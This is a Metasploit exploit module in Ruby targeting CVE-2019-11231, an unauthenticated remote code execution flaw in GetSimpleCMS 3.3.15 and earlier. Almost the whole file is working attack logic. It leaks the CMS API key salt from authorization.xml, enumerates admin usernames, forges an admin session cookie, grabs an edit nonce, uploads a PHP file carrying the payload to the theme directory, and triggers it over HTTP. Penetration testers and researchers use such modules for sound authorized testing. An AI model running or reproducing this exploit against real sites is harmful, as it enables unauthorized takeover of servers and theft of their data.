metasploit-gs/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "GetSimpleCMS Unauthenticated RCE",
        'Description' => %q{
          This module exploits a vulnerability found in GetSimpleCMS,
          which allows unauthenticated attackers to perform Remote Code Execution.
          An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
          however authentication can be bypassed by leaking the cms API key to target the session manager.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
        ],
        'References' => [
          ['CVE', '2019-11231'],
          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['GetSimpleCMS 3.3.15 and before', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2019-04-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
      ]
    )
  end

  def gscms_version
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin', '/')
    )
    return unless res && res.code == 200

    generator = res.get_html_document.at(
      '//script[@type = "text/javascript"]/@src'
    )

    fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
    vers = generator.value.split('?v=').last.gsub(".", "")
    return unless vers

    @version = vers
  end

  def get_salt
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
    @salt = res.get_xml_document.at('apikey').text
  end

  def get_user
    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
  end

  def gen_cookie(version, salt, username)
    cookie_name = "getsimple_cookie_#{version}"
    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")

    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
  end

  def get_nonce(cookie)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'admin', 'theme-edit.php'),
      'cookie' => cookie,
      'vars_get' => {
        't' => 'Innovation',
        'f' => 'Default Template',
        's' => 'Edit'
      }
    })

    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
    end
    version = gscms_version
    salt = get_salt
    username = get_user
    cookie = gen_cookie(version, salt, username)
    nonce = get_nonce(cookie)

    fname = "#{rand_text_alpha(6..16)}.php"
    php = %Q|<?php #{payload.encoded} ?>|
    upload_file(cookie, nonce, fname, php)
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'theme', fname),
    })
  end

  def check
    version = gscms_version
    unless version
      return CheckCode::Safe
    end

    vprint_status "GetSimpleCMS version #{version}"
    unless vulnerable
      return CheckCode::Detected
    end

    CheckCode::Vulnerable
  end

  def vulnerable
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )
    return unless res && res.code == 200

    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )
    return unless res && res.code == 200

    return true
  end

  def upload_file(cookie, nonce, fname, content)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'theme-edit.php'),
      'cookie' => cookie,
      'vars_post' => {
        'submitsave' => 2,
        'edited_file' => fname,
        'content' => content,
        'nonce' => nonce
      }
    })
  end
end